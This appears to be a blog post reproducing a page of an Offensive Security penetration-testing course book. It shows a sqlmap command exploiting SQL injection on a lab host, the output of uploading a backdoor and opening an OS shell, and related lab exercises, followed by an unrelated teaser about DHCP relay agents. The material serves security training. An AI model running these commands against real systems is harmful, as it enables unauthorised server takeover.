Wednesday, April 19, 2017

WAF - web application firewall - SQL injection














Penetration Testing with Kali Linux (2014)

Sqlmap contains many advanced features, such as the ability to attempt Web
Application Firewall (WAF)62 bypasses and execute complex sequences of queries that
automate a complete takeover of the server. For example, using the os-­‐‑shell parameter
will attempt to automatically upload and execute remote command shell on the target.



root@kali:~# sqlmap -­‐u http://192.168.11.35/comment.php?id=738 -­‐-­‐dbms=mysql -­‐-­‐
os-­‐shell




...
[10:31:48] [INFO] trying to upload the file stager on 'C:/xampp/htdocs' via
LIMIT INTO OUTFILE technique
[10:31:48] [INFO] heuristics detected web page charset 'ascii'
[10:31:48] [INFO] the file stager has been successfully uploaded on
'C:/xampp/htdocs' -­‐ http://192.168.11.35:80/tmpuyjsy.php
[10:31:49] [INFO] the backdoor has been successfully uploaded on
'C:/xampp/htdocs' -­‐ http://192.168.11.35:80/tmpbtbid.php
[10:31:49] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-­‐shell> ipconfig
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
-­‐-­‐-­‐

Windows IP Configuration


Ethernet adapter offsec:

Connection-­‐specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.11.35
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :






62 https://www.owasp.org/index.php/Web_Application_Firewall


 Penetration Testing with Kali Linux



PWK Copyright © 2014 Offensive Security Ltd. All rights reserved. Page 249 of 361



Tunnel adapter isatap.{4C9DFEB3-­‐BCC5-­‐4A44-­‐B797-­‐8DD85F9960D9}:

Media State . . . . . . . . . . . : Media disconnected
Connection-­‐specific DNS Suffix . :

Tunnel adapter Teredo Tunneling Pseudo-­‐Interface:

Media State . . . . . . . . . . . : Media disconnected
Connection-­‐specific DNS Suffix . :
-­‐-­‐-­‐
os-­‐shell>

13.6.1 -­‐‑ Exercises
1. Exploit the SQL injection vulnerability in the guestbook application to log in as
the admin user.
2. Manually use SQL injection to enumerate the information in the guestbook
database.
3. Use sqlmap to obtain a full dump of the database.
4. Use sqlmap to obtain an interactive shell.

DHCP relay agents instead of multiple routers

What do you think is the benefit of using DHCP relay agents instead of multiple routers acting as DHCP servers? Each router works har...